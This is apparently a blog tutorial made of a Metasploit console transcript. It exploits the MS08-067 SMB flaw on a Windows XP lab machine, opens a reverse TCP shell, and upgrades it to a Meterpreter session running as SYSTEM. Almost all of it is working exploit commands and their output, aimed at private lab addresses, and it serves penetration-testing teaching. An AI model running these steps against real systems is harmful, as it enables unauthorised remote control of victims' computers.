Seeing is believing 🙂
root@bt:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r13065 updated today (2011.06.29) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf exploit(ms08_067_netapi) > set lhost 192.168.96.1 lhost => 192.168.96.1 msf exploit(ms08_067_netapi) > set rhost 192.168.96.129 rhost => 192.168.96.129 msf exploit(ms08_067_netapi) > set lport 443 lport => 443 msf exploit(ms08_067_netapi) > exploit -z [*] Started reverse handler on 192.168.96.1:443 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700 [*] Session 1 created in the background. msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.
msf exploit(ms08_067_netapi) > sessions -h Usage: sessions [options] Active session manipulation and interaction. OPTIONS: -K Terminate all sessions -c Run a command on the session given with -i, or all -d Detach an interactive session -h Help banner -i Interact with the supplied session ID -k Terminate session -l List all active sessions -q Quiet mode -r Reset the ring buffer for the session given with -i, or all -s Run a script on the session given with -i, or all -u Upgrade a win32 shell to a meterpreter session -v List verbose fields msf exploit(ms08_067_netapi) > sessions -u 1 [*] Started reverse handler on 192.168.96.1:443 [*] Starting the payload handler... [*] Command Stager progress - 1.66% done (1699/102108 bytes) [*] Command Stager progress - 3.33% done (3398/102108 bytes) [*] Command Stager progress - 4.99% done (5097/102108 bytes) [*] Command Stager progress - 6.66% done (6796/102108 bytes) [*] Command Stager progress - 8.32% done (8495/102108 bytes) [*] Command Stager progress - 9.98% done (10194/102108 bytes) [*] Command Stager progress - 11.65% done (11893/102108 bytes) [*] Command Stager progress - 13.31% done (13592/102108 bytes) [*] Command Stager progress - 14.98% done (15291/102108 bytes) [*] Command Stager progress - 16.64% done (16990/102108 bytes) [*] Command Stager progress - 18.30% done (18689/102108 bytes) [*] Command Stager progress - 19.97% done (20388/102108 bytes) [*] Command Stager progress - 21.63% done (22087/102108 bytes) [*] Command Stager progress - 23.29% done (23786/102108 bytes) [*] Command Stager progress - 24.96% done (25485/102108 bytes) [*] Command Stager progress - 26.62% done (27184/102108 bytes) [*] Command Stager progress - 28.29% done (28883/102108 bytes) [*] Command Stager progress - 29.95% done (30582/102108 bytes) [*] Command Stager progress - 31.61% done (32281/102108 bytes) [*] Command Stager progress - 33.28% done (33980/102108 bytes) [*] Command Stager progress - 34.94% done (35679/102108 bytes) [*] Command Stager progress - 36.61% done (37378/102108 bytes) [*] Command Stager progress - 38.27% done (39077/102108 bytes) [*] Command Stager progress - 39.93% done (40776/102108 bytes) [*] Command Stager progress - 41.60% done (42475/102108 bytes) [*] Command Stager progress - 43.26% done (44174/102108 bytes) [*] Command Stager progress - 44.93% done (45873/102108 bytes) [*] Command Stager progress - 46.59% done (47572/102108 bytes) [*] Command Stager progress - 48.25% done (49271/102108 bytes) [*] Command Stager progress - 49.92% done (50970/102108 bytes) [*] Command Stager progress - 51.58% done (52669/102108 bytes) [*] Command Stager progress - 53.25% done (54368/102108 bytes) [*] Command Stager progress - 54.91% done (56067/102108 bytes) [*] Command Stager progress - 56.57% done (57766/102108 bytes) [*] Command Stager progress - 58.24% done (59465/102108 bytes) [*] Command Stager progress - 59.90% done (61164/102108 bytes) [*] Command Stager progress - 61.57% done (62863/102108 bytes) [*] Command Stager progress - 63.23% done (64562/102108 bytes) [*] Command Stager progress - 64.89% done (66261/102108 bytes) [*] Command Stager progress - 66.56% done (67960/102108 bytes) [*] Command Stager progress - 68.22% done (69659/102108 bytes) [*] Command Stager progress - 69.88% done (71358/102108 bytes) [*] Command Stager progress - 71.55% done (73057/102108 bytes) [*] Command Stager progress - 73.21% done (74756/102108 bytes) [*] Command Stager progress - 74.88% done (76455/102108 bytes) [*] Command Stager progress - 76.54% done (78154/102108 bytes) [*] Command Stager progress - 78.20% done (79853/102108 bytes) [*] Command Stager progress - 79.87% done (81552/102108 bytes) [*] Command Stager progress - 81.53% done (83251/102108 bytes) [*] Command Stager progress - 83.20% done (84950/102108 bytes) [*] Command Stager progress - 84.86% done (86649/102108 bytes) [*] Command Stager progress - 86.52% done (88348/102108 bytes) [*] Command Stager progress - 88.19% done (90047/102108 bytes) [*] Command Stager progress - 89.85% done (91746/102108 bytes) [*] Command Stager progress - 91.52% done (93445/102108 bytes) [*] Command Stager progress - 93.18% done (95144/102108 bytes) [*] Command Stager progress - 94.84% done (96843/102108 bytes) [*] Command Stager progress - 96.51% done (98542/102108 bytes) [*] Command Stager progress - 98.15% done (100216/102108 bytes) [*] Command Stager progress - 99.78% done (101888/102108 bytes) [*] Sending stage (752128 bytes) to 192.168.96.129 [*] Command Stager progress - 100.00% done (102108/102108 bytes) msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700
Well, new meterpreter session is now on the session list 😉
msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094 2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095 msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter >
nice feature, good job Metasploit team 😉